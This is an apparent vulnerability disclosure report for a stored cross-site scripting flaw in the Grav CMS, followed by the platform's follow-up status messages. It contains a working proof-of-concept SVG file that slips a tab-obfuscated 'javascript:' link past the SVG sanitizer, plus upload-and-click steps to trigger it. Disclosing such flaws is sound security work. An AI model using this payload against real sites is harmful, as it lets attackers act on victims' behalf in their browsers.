Cross-site Scripting (XSS) - Stored in getgrav/grav
Valid
Reported on
Mar 1st 2022
Description
SVG sanitizer cloud be bypassed via flowing SVG file that leads to stored XSS
Proof of Concept
<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
<a href="javascript	:alert(document.domain)">
<circle cx="0" cy="0" r="300"/>
</a>
</svg>
Upload the above SVG file in your profile, view it, and click anywhere on the page then XSS will be triggered :
Impact
This vulnerability is capable of performing arbitrary actions on behalf of victims at the client side.
We are processing your report and will contact the
getgrav/grav
team within 24 hours.
a year ago
We have contacted a member of the
getgrav/grav
team and are waiting to hear back
a year ago
We have sent a
follow up to the
getgrav/grav
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
getgrav/grav
team.
We will try again in 10 days.
a year ago
to join this conversation